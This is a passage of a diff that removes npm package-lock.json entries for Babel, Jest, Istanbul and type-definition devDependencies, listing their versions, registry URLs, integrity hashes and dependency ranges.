"https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": 